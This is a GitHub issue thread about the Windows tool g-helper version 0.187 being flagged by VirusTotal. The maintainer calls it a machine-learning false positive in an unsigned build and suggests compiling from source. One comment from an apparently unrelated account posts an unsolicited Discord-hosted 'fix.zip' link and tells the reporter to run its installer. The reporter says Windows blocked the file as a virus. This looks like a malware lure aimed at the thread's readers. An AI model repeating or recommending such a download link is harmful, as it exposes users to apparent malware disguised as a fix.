### ISSUE TITLE
The latest version gives virus warning in virustotal

### ISSUE THREAD

**Issue by srb1mal** [seerge/g-helper#3056]
### Rules

- [X] I made myself familiar with the <a href='https://github.com/seerge/g-helper?tab=readme-ov-file'>Readme</a>, <a href='https://github.com/seerge/g-helper/wiki/FAQ'>FAQ</a> and <a href='https://github.com/seerge/g-helper/wiki/Troubleshooting'>Troubleshooting</a>.
- [X] I understand that, if insufficient information or no app logs will be provided, my issue will be closed without an answer.

### What's wrong?

I scanned the latest version of ghelper (0.187) and in virus total it gave some warnings. So would you mind to elaborate. And while installing windows also gave warning where I installed the previous version it doesn't give any warning. 

### How to reproduce the bug?

N/A

### Logs

N/A

### Device and Model

Asus tuf A17 (FA706IH)

### Armoury Crate

Uninstalled

### Version

0.187

### OS

Windows 11 23H2

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by srb1mal** [comment]
Windows blocked this file download. :( showing it has virus

**Comment by seerge** [comment]
@srb1mal hello, please make yourself familiar with FAQ

> [Windows Defender or any other antivirus marks app as malware / virus](https://github.com/seerge/g-helper/wiki/FAQ#windows-defender-or-any-other-antivirus-marks-app-as-malware--virus)
> False positives from Windows Defender (or any other similar system that uses machine learning for detection) is possible as the application is not digitally signed with a certificate. You can always download a version below or compile the app by yourself.

>  All application sources are open and can be monitored from A to Z. Application is assembled directly on GitHub from this sources using GitHub actions.

As for your remark about Virustotal specifically - it's also all green (for the latest buikd)
https://www.virustotal.com/gui/url/64bc4a9446705d29571219681966ddf84107600ce4a6770461bc1396c2387604?nocache=1

**Comment by srb1mal** [comment]
Hey mate @seerge please check this,  I'm not worried about windows defender at all. In viruatotal if we upload the (.exe) then it gives a warning. Please check below.

https://www.virustotal.com/gui/file/869174222fef4b40cf89fb9b3cdd2916499368db42a8dce2348a57b7b7b8a613?nocache=1

**Comment by seerge** [comment]
@srb1mal as I have mentioned above, false positives can happen from any other similar system that uses machine learning for detection. In your case it's 1 (one) vendor from 75. If you don't trust exe - you can compile it from sources, and you will get same exe.
